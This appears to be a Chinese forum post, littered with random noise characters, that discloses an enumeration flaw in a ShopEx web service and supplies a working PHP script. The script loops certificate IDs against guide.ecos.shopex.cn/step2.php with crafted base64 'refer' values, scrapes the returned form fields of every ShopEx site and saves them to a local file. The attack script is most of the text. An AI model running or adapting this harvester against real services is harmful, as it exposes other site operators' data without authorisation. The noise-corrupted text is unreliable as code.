! f' Y# t/ k( P. L. E 4 p# [- t( q, _; ~# h% wrefer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}8 k" Z, A6 u* A* P, D, S+ F6 @
8 [' R$ W/ a2 Z) }8 X+ X g- H0 f; ^8 e9 W& W 5 E4 E, d5 Y h; _. e- l我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 7 p/ _3 d: ]/ C0 s, L3 v+ R! p2 ~ V' T( i7 k
" w9 t3 \) z c) Y( h/ B3 p
l3 ~, I% E( b, J* O2 m
<?php ?- X8 L5 N2 d3 M! i! q5 k
; c: D& j2 x5 Z
for ($i=1; $i < 10000; $i++) { //遍历& T( O* G/ J' _* A
& |1 ?( Y( D5 Y- k* G- v: c" K
ShowshopExD($i); : A, w3 ]0 G. I) U1 J \5 M' {" V# J- l$ o/ w7 j: E6 x
} , C3 z* V6 i* W) {3 D8 h7 N" v% g) c% U: O9 L4 L
function ShowshopExD($cid) { # y- X: r! I: x( L _) r1 M$ ~: ~. B/ u) C5 B S
$url='http://guide.ecos.shopex.cn/step2.php'; % p3 E% Q% ]7 f+ S/ f6 @5 C0 J1 H0 u1 c
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');7 K; M+ l9 E# X
, j/ K' g' O' o7 S% I
$url = $url.'?refer='.$refer; 9 ~ P) {! n$ ?' x* }$ {% T5 k- P$ K* i
$ch = curl_init($url); 7 h- k# H* `/ h3 a) X& t: E- q! l& [# I, W3 }- z+ v. b* Y
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ; , E, h; M8 ]. z! @1 Y) B) T+ Q+ @7 M$ v; s
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ; & d4 R0 a) ~7 M a2 o 0 e+ m: O6 `5 x3 r+ t6 C& _1 b $result = curl_exec($ch); " H ^( k, s* x8 m: ^1 x8 G% ] h2 P5 D" v) f
$result = mb_convert_encoding($result, "gb2312", "UTF-8");7 k F$ c& n# u6 A
- W$ j" k. F( y$ k9 Q if(strpos($result,$refer))4 W5 m' ]$ P% J; X6 n* z
7 o$ t- j2 }* J4 b
{ W6 z$ F J4 u/ N: k2 N
2 ~! L- w# M/ w $fp = fopen("c:/shopEx.txt",'ab'); //保存文件 1 C! S9 `7 A) C f ; O# t8 _1 g0 y) o$ k preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value); ; V. Y9 R/ t0 q ( b( W" M6 q6 q' {+ P: c foreach ($value[1] as $key) {) c9 x; }2 y' v" O% F
6 N! @4 ^$ U6 }0 G% I! Y preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);% j/ ]3 {( @+ U) S
9 C4 A. W `3 @6 p* }0 M6 \* k! _- o
echo $res[1][0].':'.$res[3][0]."\r\n"; 7 ?! m. z3 n/ c+ u# y% O* ~% I/ L: C
$col =$res[1][0].':'.$res[3][0]."\r\n"; , Z! h0 U8 A8 F \" H3 C. z# K3 ~+ L( p% i; A t
fwrite($fp, $col, strlen($col)); 9 C. N J0 ~) p7 d5 l' Z
( h9 p4 z9 `, ^4 W+ c- u/ ?5 k }7 s( J& C" c- ^
" T6 H4 e$ R6 y" I
echo '--------------------------------'."\r\n"; 4 g4 z' V% i5 O2 L1 B! Z! c $ u& ?; ?( d2 I I1 `" A, b0 X6 a" k fclose($fp); 2 S3 p0 k! C9 o' B' ^) \
: A7 n0 @$ `+ n! i. D* _# ?
} 0 n a# r% l; W) t4 ^ c5 B; A+ w8 x3 {- b
flush(); : A. g5 A- m- r/ n- U# e$ ^3 }9 H! g# |& T9 m8 _. _; G
curl_close($ch);; W" ~" r; x: I8 ~
$ ]# O$ O. @! d. O
} + G4 x6 T5 E, q4 K! x 3 [) {% p( B1 b+ B?> 3 v2 [3 t/ d+ T! u漏洞证明:: l. S0 F( t4 u5 z http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg 6 n" i' j# r/ Erefer换成其他加密方式9 c3 g2 L1 \. J Q0 w7 C! b